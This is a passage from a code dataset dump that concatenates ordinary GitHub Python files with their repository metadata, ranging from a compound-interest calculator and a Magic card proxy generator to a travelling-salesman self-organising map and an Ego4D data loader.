totalBase = 0\n total = 0\n while (monthsLeft > 0):\n totalBase += inputBase\n total += calcTotalByMonths(inputBase, yearRate, monthsLeft)\n monthsLeft -= freqMonth\n return totalBase, total, 
total-totalBase\n\ndef calcTotalByFreqInput_Years(inputBase, freq = 1.0 / 12, yearRate = 0.04, years = 1):\n yearsLeft = years \n totalBase = 0\n total = 0\n while (yearsLeft > 0):\n totalBase += inputBase\n total += inputBase * math.pow(1 + yearRate, yearsLeft)\n yearsLeft -= freq\n return totalBase, total, total-totalBase\n\nif __name__ == '__main__':\n print(yearRate2DayRate(0.04))\n print(calcTotalByFreqInput(5000, yearRate = 0.04, days = 360))\n print(calcTotalByFreqInput(5000, yearRate = 0.04, days = 3600))\n\n print(yearRate2MonthRate(0.04))\n print(calcTotalByFreqInput_Month(5000, yearRate = 0.04, months = 12))\n print(calcTotalByFreqInput_Month(5000, yearRate = 0.04, months = 120))\n\n print(calcTotalByFreqInput_Years(5000, yearRate = 0.04, years = 1))\n print(calcTotalByFreqInput_Years(5000, yearRate = 0.04, years = 10))\n\n","repo_name":"random634/LifeTrifling","sub_path":"CalcMoney.py","file_name":"CalcMoney.py","file_ext":"py","file_size_in_byte":2268,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"23889137409","text":"import json\nimport re\n\n\ndef get_county_id(record):\n return record[29:32]\n\n\ndef get_record_num(record):\n return record[18:25]\n\n\ndef read_precincts():\n with open('precincts.json') as f:\n precincts = json.load(f)\n\n ids = set()\n\n for precinct in precincts['features']:\n ids.add(precinct['properties']['name'])\n\n return ids\n\n\ndef get_pop_data(record_nums):\n pop_file = 'pop_data/al1.pl'\n record_to_pop = {}\n\n with open(pop_file) as f:\n for line in f:\n fields = line.split(',')\n record_num = fields[4]\n\n if record_num in record_nums:\n pop = {\n 'population': int(fields[5]),\n 'white': int(fields[7]),\n 'black': int(fields[8]),\n 'native_american': int(fields[9]),\n 'asian': int(fields[10]),\n 'pacific_islander': int(fields[11]),\n 'other': int(fields[12]),\n 'hispanic': int(fields[77])\n }\n\n record_to_pop[record_num] = pop\n\n return record_to_pop\n\n\ndef get_records():\n headers_file = 'pop_data/al_headers.pl'\n prec_to_record = {}\n prec_to_pop = {}\n\n record_nums = set()\n\n with open(headers_file) as f:\n for line in f:\n if 'AL700' in line:\n prec_id = line[226:316].strip()\n county_id = get_county_id(line)\n record_num = get_record_num(line)\n\n prec_to_record[(county_id, prec_id)] = record_num\n record_nums.add(record_num)\n\n record_to_pop = get_pop_data(record_nums)\n\n for prec in prec_to_record:\n prec_to_pop[prec] = record_to_pop[prec_to_record[prec]]\n\n return prec_to_pop\n\n\ndef main():\n prec_to_pop = get_records()\n precinct_input_file = 'al_precincts_input.json'\n\n with open(precinct_input_file) as f:\n precincts = json.load(f)\n\n for precinct in precincts['features']:\n county_id = precinct['properties']['county']\n prec_id = precinct['properties']['name']\n print(prec_id)\n\n pop = prec_to_pop[(county_id, prec_id)]\n props = precinct['properties'] | pop\n precinct['properties'] = props\n\n precinct_output_file = 'al_precincts_output.json'\n\n with open(precinct_output_file, 'w') as f:\n json.dump(precincts, f)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"wongislandd/GerrymanderingWebApp","sub_path":"Scripts/PreprocessNC/getTotalPop.py","file_name":"getTotalPop.py","file_ext":"py","file_size_in_byte":2418,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"33"} +{"seq_id":"3907790604","text":"# coding : utf-8\nimport os\nimport re\nimport shutil\nfrom urllib.request import urlopen, urlretrieve\nfrom 
urllib.parse import quote_plus\nimport param\nfrom log import logger as log\n\n\nINPUT_REGEX = \"^(?:SB\\s?\\:*\\s?)?(\\d+)\\s+(?:\\[(.{2}.?)\\])?\\s?([\\w,'\\-\\s\\(\\)\\./]*?)(?:\\s*#+.*)?$\"\nONLINE_REGEX = \"(http://magiccards\\.info/scans/en/\\w{2,3}/\\d{1,3}\\w?\\.jpg)\"\nLAND_VERSION_REGEX = '\\s?\\(v\\.?\\s?([0-9]*)\\)'\n\nLAND_NAMES = ['plains', 'island', 'swamp', 'mountain', 'forest']\n\ncurrent_proxy_id = 1\n\n\ndef copy_card(path, quantity):\n global current_proxy_id\n for i in range(0, int(quantity)):\n shutil.copy(path, os.path.join(param.OUTPUT_PROXY_DIR, str(current_proxy_id) + \".jpg\"))\n current_proxy_id += 1\n\n\ndef adapt_regex_if_land(regex, card_name):\n reg = re.compile(LAND_VERSION_REGEX, re.IGNORECASE)\n if reg.search(card_name):\n land_version = reg.findall(card_name)[0]\n name = reg.sub('', card_name)\n regex = re.escape(name) + '\\s?\\(v\\.\\s?' + land_version + '\\)'\n elif card_name in LAND_NAMES: # TODO: make land card variation optional\n regex += '\\s?\\(v\\.\\s?1\\)'\n return regex\n\n\ndef find_card_offline(name, cardset=None):\n regex = name.lower()\n regex = adapt_regex_if_land(regex, name) + '(?! )\\.' # not followed by a space, but followed by a dot\n for edition_trigram in param.EDITION_TRIGRAMS:\n try:\n edition_scan_path = os.path.join(param.SCANS_DIR, edition_trigram)\n reg = re.compile(regex, re.IGNORECASE)\n for filename in os.listdir(edition_scan_path):\n if reg.match(filename):\n edition_file_path = os.path.join(edition_scan_path, filename)\n if os.path.getsize(edition_file_path) > 0:\n found = edition_file_path\n if not cardset or os.path.basename(edition_scan_path) == cardset:\n return found\n except IOError:\n continue\n\n\ndef is_double_faced_card(cardname):\n return True if cardname.lower() in param.CARDS_DOUBLE_FACED.keys() else False\n\n\ndef create_proxy_offline(quantity, cardname, cardset=''):\n cardname_splitted = cardname.split('//')[0].rstrip().lower()\n if is_double_faced_card(cardname_splitted):\n if not create_proxy_offline(quantity, param.CARDS_DOUBLE_FACED[cardname_splitted], cardset):\n log.error(\"'{}' not found in scans directory \".format(cardname_splitted))\n return_code = 0\n else:\n filepath = find_card_offline(cardname_splitted, cardset)\n copy_card(filepath, quantity)\n log.info(\"{} '{}' created using file {}\".format(quantity, cardname_splitted, filepath))\n return_code = 1\n else:\n cardname_replaced = re.sub(\"\\s*/{1,2}\\s*\", \"_\", cardname)\n filepath = find_card_offline(cardname_replaced, cardset)\n if filepath:\n copy_card(filepath, quantity)\n log.info(\"{} '{}' created using file {}\".format(quantity, cardname_replaced, filepath))\n return_code = 1\n else:\n log.error(\"'{}' not found in scans directory \".format(cardname_replaced))\n return_code = 0\n return return_code\n\n\ndef create_proxy_online(quantity, cardname, cardset=''):\n global current_proxy_id\n if cardset == '':\n searchurl = \"http://magiccards.info/query?q=!{}&v=card&s=cname\".format(\n quote_plus(cardname.lower()))\n else:\n searchurl = \"http://magiccards.info/query?q={}+e%3A{}&v=card&s=cname\".format(\n quote_plus(cardname.lower()),\n quote_plus(cardset.lower()))\n with urlopen(searchurl) as response:\n httpcontent = response.readlines()\n if re.search(ONLINE_REGEX, str(httpcontent)):\n imageurl = re.findall(ONLINE_REGEX, str(httpcontent))[0]\n tmpfile = urlretrieve(imageurl)[0]\n copy_card(tmpfile, quantity)\n log.info(\"{} '{}' created using {}\".format(quantity, cardname, imageurl))\n return 1\n else:\n log.error(\"'\" + cardname + 
\"' not found online with URL \" + searchurl)\n return 0\n\n\ndef card_not_found(name):\n with open(param.NOT_FOUND_FILE, 'a') as fd:\n fd.write(name)\n\n\ndef process_input_file(input_file):\n with open(input_file, 'r', encoding='utf8') as fd:\n lines = fd.readlines()\n compiled_regex = re.compile(INPUT_REGEX, re.M | re.I)\n for line in lines:\n if compiled_regex.match(line) is not None:\n quantity, cardset, cardname = map(lambda x: x.strip(), compiled_regex.findall(line)[0])\n log.debug(\"quantity : \" + cardname)\n log.debug(\"quantity : \" + quantity)\n log.debug(\"cardset : \" + cardset)\n if not cardset:\n log.info(\"Searching for '{}' in the most recent edition\".format(cardname))\n else:\n log.info(\"Searching for '{}' in [{}] edition\".format(cardname, cardset))\n if param.MODE_PRIORITY.lower() == 'offline':\n if not create_proxy_offline(quantity, cardname, cardset):\n if param.TRY_OTHER_METHOD and not create_proxy_online(quantity, cardname, cardset):\n card_not_found(line)\n else:\n card_not_found(line)\n else:\n if not create_proxy_online(quantity, cardname, cardset):\n if param.TRY_OTHER_METHOD and not create_proxy_offline(quantity, cardname, cardset):\n card_not_found(line)\n else:\n card_not_found(line)\n\n\ndef delete_older_work():\n os.makedirs(param.OUTPUT_DIR, exist_ok=True)\n for root, dirs, files in os.walk(param.OUTPUT_DIR, topdown=False):\n for name in files:\n os.remove(os.path.join(root, name))\n for name in dirs:\n os.rmdir(os.path.join(root, name))\n os.makedirs(param.OUTPUT_PROXY_DIR)\n log.debug(os.path.join(param.OUTPUT_DIR, param.OUTPUT_FILE_NAME))\n if param.OUTPUT_FILE_EXTENSION == '.sla':\n sla_filename = os.path.join(param.CONF_DIR, \"Proxy.sla\")\n shutil.copy(sla_filename, os.path.join(param.OUTPUT_DIR, param.OUTPUT_FILE_NAME))\n open(param.NOT_FOUND_FILE, 'w').close()\n\n\nif __name__ == '__main__':\n delete_older_work()\n process_input_file(param.PROXY_FILE)\n if param.OUTPUT_TYPE == 'pdf':\n import pdf\n pdf.print_pdf(current_proxy_id - 1, os.path.join(param.OUTPUT_DIR, param.OUTPUT_FILE_NAME))\n","repo_name":"Abraxas27/MTGProxy","sub_path":"MTGProxy/MTGProxy.py","file_name":"MTGProxy.py","file_ext":"py","file_size_in_byte":6494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"25864382883","text":"class PuzzleClass:\n def __init__(self, game_board, table):\n # region -> 공통 변수 & 상수]\n self.labels = dict()\n self.label = 10 # 현재 퍼즐 조각 번호\n self.label_count = 0 # 퍼즐 조각 갯수\n\n self.BACKGROUND_NUM = 0 # 배경 상수\n self.LEN_MATRIX = len(game_board)\n # endregion\n\n # region -> game_board 관련 변수\n self.game_board = self.get_reverse_matrix(game_board)\n self.labels_gb = dict()\n\n self.label_gb = 10\n self.label_count_gb = 0\n # endregion\n\n # region -> table 관련 변수\n self.table = table\n\n self.label_gb = 10\n self.label_count_gb = 0\n # endregion\n\n def get_reverse_matrix(self, matrix):\n for row in range(self.LEN_MATRIX):\n for col in range(self.LEN_MATRIX):\n if matrix[row][col] == 1:\n matrix[row][col] = 0\n else:\n matrix[row][col] = 1\n return matrix\n\n def get_labeled_matrix(self, matrix):\n \"\"\"\n 전체 matrix에 대해 라벨링된 매트릭스를 리턴받음\n :param matrix:\n :return:\n \"\"\"\n\n self.labels = dict()\n for row in range(self.LEN_MATRIX):\n for col in range(self.LEN_MATRIX):\n if matrix[row][col] == 1:\n self.label += 1\n self.labels[self.label] = 0\n self.get_labeled_matrix_pixel(matrix, row, col)\n\n return matrix\n\n def get_labeled_matrix_pixel(self, matrix, row, col):\n \"\"\"\n 특정 row와 col 기준 라벨링된 
매트릭스를 리턴받음\n :param matrix:\n :return:\n \"\"\"\n\n if (0 <= row < self.LEN_MATRIX and\n 0 <= col < self.LEN_MATRIX):\n\n if matrix[row][col] == 1:\n matrix[row][col] = self.label\n self.labels[self.label] += 1\n\n self.get_labeled_matrix_pixel(matrix, row - 1, col)\n self.get_labeled_matrix_pixel(matrix, row + 1, col)\n self.get_labeled_matrix_pixel(matrix, row, col - 1)\n self.get_labeled_matrix_pixel(matrix, row, col + 1)\n\n return matrix\n\n\ngame_board, table = [[1, 1, 0, 0, 1, 0],\n [0, 0, 1, 0, 1, 0],\n [0, 1, 1, 0, 0, 1],\n [1, 1, 0, 1, 1, 1],\n [1, 0, 0, 0, 1, 0],\n [0, 1, 1, 1, 0, 0]], \\\n [[1, 0, 0, 1, 1, 0],\n [1, 0, 1, 0, 1, 0],\n [0, 1, 1, 0, 1, 1],\n [0, 0, 1, 0, 0, 0],\n [1, 1, 0, 1, 1, 0],\n [0, 1, 0, 0, 0, 0]]\n\npuzzle_class = PuzzleClass(game_board, table)\npuzzle_class.game_board = puzzle_class.get_labeled_matrix(puzzle_class.game_board)\n\nfor row in puzzle_class.game_board:\n print(row)\n# print(puzzle_class.table)\n","repo_name":"KIMSEULBEEN/problem-solving","sub_path":"Programmers/그래프/퍼즐_조각_채우기.py","file_name":"퍼즐_조각_채우기.py","file_ext":"py","file_size_in_byte":2962,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"33"} +{"seq_id":"35132186182","text":"import email\nfrom django.shortcuts import render\n\nfrom .models import Inicio, Sobre, Servicos, Portfolio, Depoimentos, Contato, FormContato\n\n# Create your views here.\n\n\ndef index(request):\n\n inicio = Inicio.objects.last()\n sobre = Sobre.objects.first()\n servicos = Servicos.objects.all()[:3]\n portfolio = Portfolio.objects.all()[:4]\n depoimentos = Depoimentos.objects.all()[:3]\n contato = Contato.objects.last()\n formcontato = FormContato.objects.last()\n\n context = {\n 'inicio': inicio,\n 'sobre': sobre,\n 'servicos': servicos,\n 'portfolio': portfolio,\n 'depoimentos': depoimentos,\n 'contato': contato,\n 'formcontato': formcontato\n }\n\n if request.method == 'POST':\n nome_form = request.POST['nome']\n telefone_form = request.POST['telefone']\n email_form = request.POST['email']\n texto_form = request.POST['mensagem']\n\n form = FormContato(nome=nome_form, telefone=telefone_form,\n email=email_form, mensagem=texto_form)\n form.save()\n\n return render(request, 'index.html', context)\n","repo_name":"jpspaiva/dissemina_back","sub_path":"site_institucional/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1127,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"15888407596","text":"from setuptools import setup\n\npackage_name = 'my_py_pkg'\n\nsetup(\n name=package_name,\n version='0.0.0',\n packages=[package_name],\n data_files=[\n ('share/ament_index/resource_index/packages',\n ['resource/' + package_name]),\n ('share/' + package_name, ['package.xml']),\n ],\n install_requires=['setuptools'],\n zip_safe=True,\n maintainer='us-robot',\n maintainer_email='us-robot@todo.todo',\n description='TODO: Package description',\n license='TODO: License declaration',\n tests_require=['pytest'],\n entry_points={\n 'console_scripts': [\n \"imu_node = my_py_pkg.imu_sensor:main\",\n \"controller_node = my_py_pkg.robot_controller:main\",\n \"wheels_node = my_py_pkg.wheels_controller:main\"\n ],\n },\n)\n","repo_name":"TheMechatronic/ROS2_Robotic_Car","sub_path":"src/my_py_pkg/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":799,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"1931178603","text":"def 
getMakerPos(stream):\n\tfor character in stream:\n\t\tif stream.count(character) > 1:\n\t\t\treturn False\n\treturn True\n\n\ndef searchPacket(stream, seqLen):\n\ti = 0\n\tfound = False\n\twhile i < len(stream) and not found:\n\t\tfound = getMakerPos(stream[i:seqLen+i])\n\t\tif found:\n\t\t\treturn seqLen+i\n\t\ti = i + 1\n\n\ndef puzzle1(f):\n\tstream = f.readline()\n\treturn searchPacket(stream, 4)\n\n\ndef puzzle2(f):\n\tstream = f.readline()\n\treturn searchPacket(stream, 14)\n\n\ndef main():\n\tfname = \"./day6.txt\"\n\twith open(fname) as f:\n\t\tprint(puzzle1(f))\n\t\tf.seek(0)\n\t\tprint(puzzle2(f))\n\n\nif __name__ == \"__main__\":\n\tmain()","repo_name":"ryanm101/adventofcode","sub_path":"2022/day6.py","file_name":"day6.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"36109839778","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport os\nimport subprocess\nimport pickle\nfrom copy import deepcopy\nimport pandas as pd\n\n# Keeps track of the different available decay functions\nclass DecayFunctions:\n\n def __init__(self, factor):\n self.factor = factor\n return\n\n def exp(self,time):\n return np.exp(-time/self.factor)\n\n def lin(self,time):\n return 1-time/10000\n\n def __getitem__(self, item):\n return getattr(self,item)\n\n\n# Handles graph creation. Currently only for TSP\nclass GraphMaker:\n\n def __init__(self,output_dir):\n self.output_dir = output_dir\n self.plot_no = len(os.listdir(output_dir))\n\n def show_plot(self,cities_x,cities_y,som_x,som_y):\n plt.scatter(cities_x,cities_y)\n plt.scatter(som_x,som_y,color=\"RED\")\n plt.plot(som_x,som_y,color=\"GREEN\")\n plt.show()\n return\n\n def save_plot(self,cities_x,cities_y,som_x,som_y,nfactor=\"\",lrate=\"\"):\n plt.scatter(cities_x,cities_y,color=\"BLUE\")\n plt.scatter(som_x,som_y,color=\"RED\")\n plt.plot(som_x,som_y,color=\"GREEN\")\n plt.title(\"Nfactor: \"+str(nfactor)+\" lrate: \"+str(lrate))\n plt.savefig(self.output_dir+\"/plot\"+str(self.plot_no))\n plt.close()\n self.plot_no += 1\n\n return\n\n\n# Main class that represents the self organising map\nclass SOM:\n\n # Sets a directory to use for outputting files\n def get_output_dir(self,output_dir=None):\n if output_dir:\n dirno = len(os.listdir(\"output/\"))\n os.makedirs(\"output/\" + output_dir+str(dirno), exist_ok=False)\n return \"output/\"+output_dir+str(dirno)\n else:\n dirno = len(os.listdir(\"output/\"))\n os.makedirs(\"output/\"+str(dirno),exist_ok=False)\n return \"output/\"+str(dirno)\n\n # Todo initializes nodes spread randomly around the same area as the cities\n def matrix_init(self):\n x_min,x_max,y_min,y_max = self.cman.minmax()\n # x_col = np.full(self.output_size,x_max-x_min)\n # y_col = np.full(self.output_size, y_max - y_min)\n weights = np.random.random_sample((self.output_size,self.input_size))\n weights[:,0] = weights[:,0]*(x_max-x_min)+x_min\n weights[:, 1] = weights[:, 1] * (y_max - y_min) + y_min\n return weights\n \n def rand_init(self):\n weights = np.random.random_sample((self.output_size,self.input_size))\n x_min,x_max,y_min,y_max = self.cman.minmax()\n x_cen = x_min + 0.5*(x_max-x_min)\n y_cen = y_min + 0.5 * (y_max - y_min)\n x_s = (x_max-x_min)\n y_s = (y_max - y_min)\n weights = weights-0.5\n weights[:,0] = weights[:,0]*x_s+x_cen\n weights[:,1] = weights[:,1] * y_s + y_cen\n return weights\n\n def circle_init(self):\n x_min,x_max,y_min,y_max = self.cman.minmax()\n x_cen,y_cen = self.cman.center()\n nodes = 
self.output_size\n x_val = (x_max-x_min)/6\n y_val = (y_max-y_min)/6\n weights = []\n for x in range(nodes):\n x_ser = np.cos(x/nodes*2*np.pi)*x_val+x_cen\n y_ser = np.sin(x / nodes * 2 * np.pi) * y_val + y_cen\n weights.append([x_ser,y_ser])\n return np.array(weights)\n\n def center_init(self):\n x_cen,y_cen = self.cman.center()\n weights = np.full((self.output_size,self.input_size),0)\n weights[:,0] = weights[:,0]+x_cen\n weights[:, 1] = weights[:, 1] +y_cen\n return weights\n\n # Returns a list representing which nodes are actually on top of a city and which that are not\n def active_nodes(self):\n cities = self.cman.get_all_cases()\n active = np.full(self.output_size,0)\n for city in cities:\n results = np.square(self.weights - city)\n summarized = results.sum(1)\n winner_index = summarized.argmin()\n active[winner_index] = 1\n return active\n\n # Calculates the pathlength of the current SOM position, after removing nodes not assigned to any city\n def path_length(self,return_nodes=False):\n total_length = 0.\n weights = deepcopy(self.weights)\n nodecities = [[] for i in range(weights.shape[0])]\n cities = self.cman.get_all_cases()\n for i in range(len(cities)):\n results = np.square(self.weights - cities[i])\n summarized = results.sum(1)\n winner = summarized.argmin()\n nodecities[winner].append(cities[i])\n old_city = None\n first_city = None\n #loop through cities and add the distance between them\n for node in nodecities:\n for city in node:\n if not old_city:\n old_city = city\n first_city = city\n continue\n x = np.abs(city[0]-old_city[0])\n y = np.abs(city[1] - old_city[1])\n dist = np.sqrt(x**2+y**2)\n total_length += dist\n old_city = city\n # Add distance from first to last city\n x = np.abs(first_city[0] - old_city[0])\n y = np.abs(first_city[1] - old_city[1])\n dist = np.sqrt(x ** 2 + y ** 2)\n total_length += dist\n # Return view of which nodes were close to a city\n if return_nodes:\n active_nodes = self.active_nodes()\n for i in range(len(active_nodes)-1,-1,-1):\n if not active_nodes[i]: weights = np.delete(weights,i,0)\n return total_length,weights\n return total_length\n\n #\n # # Calculates the pathlength of the current SOM position, after removing nodes not assigned to any city\n # def path_length(self, return_nodes=False):\n # total_length = 0.\n # active_nodes = self.active_nodes()\n # weights = deepcopy(self.weights)\n # for i in range(len(active_nodes)-1,-1,-1):\n # if not active_nodes[i]: weights = np.delete(weights,i,0)\n # for i in range(1,len(weights)):\n # x = np.abs(weights[i-1][0]-weights[i][0])\n # y = np.abs(weights[i - 1][1] - weights[i][1])\n # dist = np.sqrt(x**2+y**2)\n # total_length += dist\n # if return_nodes:\n # return total_length,weights\n # return total_length\n\n def __init__(self,\n lr,\n input_size,\n output_size,\n decay_func,\n decay_half_life,\n caseman,\n n_factor,\n n_halftime,\n graph_int,\n video = False,\n output_dir = None,\n save = True,\n print_interval = 100\n\n ):\n self.lr = lr\n self.decay_half_life = DecayFunctions(decay_half_life)[decay_func]\n self.input_size = input_size\n self.output_size = output_size\n self.cman = caseman\n self.output_dir = self.get_output_dir(output_dir)\n self.graph_maker = GraphMaker(self.output_dir)\n self.n_factor = n_factor # Defines neighbourhood size. 
This equals approx 3 neighbours on each side\n self.updated_n_factor = self.n_factor\n self.graph_int = graph_int # Defines how often graphs are to be saved\n self.n_halftime = n_halftime\n self.video = video\n self.print_interval = print_interval\n\n self.weights = self.circle_init()\n self.updated_lr = self.lr\n self.save = save\n\n # Returns the neighbours of the node\n def neighbours(self, node_index,cutoff_lim=0.05):\n neighbours = []\n i = 1\n while True:\n distance_factor = np.exp((-i**2/(self.updated_n_factor**2)))\n if distance_factor <= cutoff_lim: break\n neighbours.append(((node_index+i)% len(self.weights), distance_factor))\n neighbours.append(((node_index-i)% len(self.weights), distance_factor))\n i += 1\n return neighbours\n\n # Adjusts the weights of the input node, depending on the learning rate and distance from winning node.\n def adjust(self, input, node_index, distance):\n diff = input-self.weights[node_index]\n self.weights[node_index] = self.weights[node_index] + diff*distance*self.updated_lr\n\n # Trains the neural network on one input event\n def train(self, input):\n results = np.square(self.weights-input)\n summarized = results.sum(1)\n winner = summarized.argmin()\n\n # Adjusts weights of winner node itself\n self.adjust(input,winner,1)\n\n # adjust weights of neighbours\n for (node,distance) in self.neighbours(winner):\n self.adjust(input,node,distance)\n\n # Executes a training session with cases\n def run(self, iterations):\n for i in range(iterations):\n # Run one training iteration\n input = self.cman.next()\n self.train(input)\n\n # Updates learning rate and neighbourhood rates before next iteration\n self.updated_lr = self.lr*self.decay_half_life(i)\n self.updated_n_factor = self.n_factor*np.exp(-i/self.n_halftime)\n\n # Generate charts\n if i%self.graph_int == 0:\n self.graph_maker.save_plot(self.cman.x,self.cman.y,self.weights[:,0],self.weights[:,1],self.updated_n_factor,self.updated_lr)\n\n if i%self.print_interval == 0 and i!=0:\n print(\"Currently on step: \" + str(i))\n\n\n # Finishing comments\n pl,used_nodes = self.path_length(return_nodes=True)\n #print(\"Path length= \" + str(pl))\n self.graph_maker.save_plot(self.cman.x, self.cman.y, used_nodes[:, 0], used_nodes[:, 1])\n\n # Makes a video of all the image files\n if self.video:\n cwd = os.getcwd()\n outputdir = os.path.join(cwd, self.output_dir)\n os.chdir(outputdir)\n os.system(\"ffmpeg -r 30 -f image2 -s 640x480 -i plot%d.png -vcodec libx264 -crf 25 -pix_fmt yuv420p _video.mp4 > /dev/null\")\n os.chdir(cwd)\n\n # Saves the SOM to a file\n if self.save:\n cwd = os.getcwd()\n outputdir = os.path.join(cwd, self.output_dir)\n os.chdir(outputdir)\n with open(\"SOM.pkl\", \"wb\") as f:\n pickle.dump(self, f)\n os.chdir(cwd)\n df = pd.DataFrame()\n #df = pd.read_csv(\"running_res.csv\")\n params = deepcopy(vars(self))\n params[\"path_length\"] = self.path_length()\n params[\"iterations\"] = iterations\n df = df.append(params, ignore_index=True)\n df.to_csv(\"running_res.csv\")\n\n return self.path_length(), self.output_dir\n\n\n\n","repo_name":"markusrk/Module3","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10696,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"2867567683","text":"\"\"\"\nConvert a CSV file to JSON\n\"\"\"\nimport json\n\nfrom backend.lib.processor import BasicProcessor\n\n__author__ = \"Stijn Peeters\"\n__credits__ = [\"Stijn Peeters\"]\n__maintainer__ = \"Stijn Peeters\"\n__email__ = 
\"4cat@oilab.eu\"\n\nclass ConvertCSVToJSON(BasicProcessor):\n\t\"\"\"\n\tConvert a CSV file to JSON\n\t\"\"\"\n\ttype = \"convert-csv\" # job type ID\n\tcategory = \"Conversion\" # category\n\ttitle = \"Convert to JSON\" # title displayed in UI\n\tdescription = \"Change a CSV file to a JSON file\" # description displayed in UI\n\textension = \"json\" # extension of result file, used internally and in UI\n\n\t@classmethod\n\tdef is_compatible_with(cls, module=None, user=None):\n\t\t\"\"\"\n\t\tDetermine if processor is compatible with a dataset or processor\n\n\t\t:param module: Module to determine compatibility with\n\t\t\"\"\"\n\t\t\n\t\treturn module.get_extension() == \"csv\"\n\n\tdef process(self):\n\t\t\"\"\"\n\t\tThis takes a CSV file as input and writes the same data as a JSON file\n\t\t\"\"\"\n\t\tposts = 0\n\t\tself.dataset.update_status(\"Converting posts\")\n\n\t\t# we write to file per row, instead of json.dumps()ing all of it at\n\t\t# once, since else we risk having to keep a lot of data in memory,\n\t\t# and this buffers one row at most\n\t\twith self.dataset.get_results_path().open(\"w\") as output:\n\t\t\toutput.write(\"[\")\n\t\t\tfor post in self.source_dataset.iterate_items(self):\n\t\t\t\tposts += 1\n\n\t\t\t\tif posts > 1:\n\t\t\t\t\toutput.write(\",\")\n\n\t\t\t\toutput.write(json.dumps(post))\n\t\t\toutput.write(\"]\")\n\n\t\tself.dataset.update_status(\"Finished.\")\n\t\tself.dataset.finish(num_rows=posts)\n","repo_name":"digitalmethodsinitiative/4cat","sub_path":"processors/conversion/csv_to_json.py","file_name":"csv_to_json.py","file_ext":"py","file_size_in_byte":1506,"program_lang":"python","lang":"en","doc_type":"code","stars":192,"dataset":"github-code","pt":"33"} +{"seq_id":"35239350309","text":"#!/usr/bin/env python3\r\n# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved.\r\n\r\nimport os\r\nimport random\r\nimport json\r\nfrom pathlib import Path\r\n\r\nimport cv2\r\nimport numpy as np\r\nimport torch\r\nimport torch.utils.data\r\n\r\n# from iopath.common.file_io import PathManager\r\nfrom iopath.common.file_io import g_pathmgr\r\nimport slowfast.utils.logging as logging\r\n\r\nfrom . import decoder as decoder\r\nfrom . import utils as utils\r\nfrom . import video_container as container\r\nfrom .build import DATASET_REGISTRY\r\n\r\nlogger = logging.get_logger(__name__)\r\n\r\n\r\n@DATASET_REGISTRY.register()\r\nclass Ego4dhand(torch.utils.data.Dataset):\r\n \"\"\"\r\n Ego4D video loader. Construct the ego4d video loader, then sample\r\n clips from the videos. For training and validation, a single clip is\r\n randomly sampled from every video with random cropping, scaling, and\r\n flipping. For testing, multiple clips are uniformaly sampled from every\r\n video with uniform cropping. For uniform cropping, we take the left, center,\r\n and right crop if the width is larger than height, or take top, center, and\r\n bottom crop if the height is larger than the width.\r\n \"\"\"\r\n\r\n def __init__(self, cfg, mode, num_retries=10):\r\n \"\"\"\r\n Construct the Ego4D video loader with a given csv file. 
The format of\r\n the csv file is:\r\n ```\r\n path_to_video_1 label_1\r\n path_to_video_2 label_2\r\n ...\r\n path_to_video_N label_N\r\n ```\r\n Args:\r\n cfg (CfgNode): configs.\r\n mode (string): Options includes `train`, `val`, or `test` mode.\r\n For the train and val mode, the data loader will take data\r\n from the train or val set, and sample one clip per video.\r\n For the test mode, the data loader will take data from test set,\r\n and sample multiple clips per video.\r\n num_retries (int): number of retries.\r\n \"\"\"\r\n # Only support train, val, and test mode.\r\n assert mode in [\r\n \"train\",\r\n \"val\",\r\n \"test\",\r\n \"trainval\",\r\n ], \"Split '{}' not supported for Ego4D Hand Anticipation\".format(mode)\r\n self.mode = mode\r\n self.cfg = cfg\r\n\r\n self._video_meta = {}\r\n self._num_retries = num_retries\r\n # For training or validation mode, one single clip is sampled from every\r\n # video. For testing, NUM_ENSEMBLE_VIEWS clips are sampled from every\r\n # video. For every clip, NUM_SPATIAL_CROPS is cropped spatially from\r\n # the frames.\r\n if self.mode in [\"train\", \"val\", \"trainval\"]:\r\n self._num_clips = 1\r\n elif self.mode in [\"test\"]:\r\n self._num_clips = cfg.TEST.NUM_ENSEMBLE_VIEWS * cfg.TEST.NUM_SPATIAL_CROPS\r\n\r\n logger.info(\"Constructing Ego4D {}...\".format(mode))\r\n self._construct_loader()\r\n\r\n def _construct_loader(self):\r\n \"\"\"\r\n Construct the video loader.\r\n \"\"\"\r\n path_to_file = os.path.join(\r\n self.cfg.DATA.PATH_TO_DATA_DIR,\r\n \"v1/annotations/fho_hands_{}.json\".format(self.mode),\r\n )\r\n assert g_pathmgr.exists(path_to_file), \"{} dir not found\".format(path_to_file)\r\n datadir = Path(self.cfg.DATA.PATH_TO_DATA_DIR)\r\n self._path_to_ant_videos = []\r\n self._pre45_clip_frames = []\r\n self._pre45_frames = []\r\n self._labels = []\r\n self._labels_masks = []\r\n self._clip_idx = []\r\n self._spatial_temporal_idx = []\r\n f = open(path_to_file)\r\n data = json.load(f)\r\n f.close()\r\n # print(self._num_clips)\r\n for clip_dict in data[\"clips\"]:\r\n video_uid = clip_dict[\"video_uid\"]\r\n if video_uid in self.cfg.DATA.DELETE:\r\n print(\r\n f\"{video_uid} is invalid video, so it will not be included in the dataset\"\r\n )\r\n continue\r\n for frame_dict in clip_dict[\"frames\"]:\r\n self._clip_idx.append(clip_dict[\"clip_id\"])\r\n clip_uid = clip_dict[\"clip_uid\"]\r\n path_to_image_frame = datadir / Path(\"v1/image_frame\") / Path(clip_uid)\r\n 